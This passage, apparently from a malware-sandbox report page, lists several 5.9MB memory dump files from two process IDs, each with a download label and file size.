                    Download

                  • memory/2872-289-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/3064-144-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/3064-198-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/3064-147-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/3064-143-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download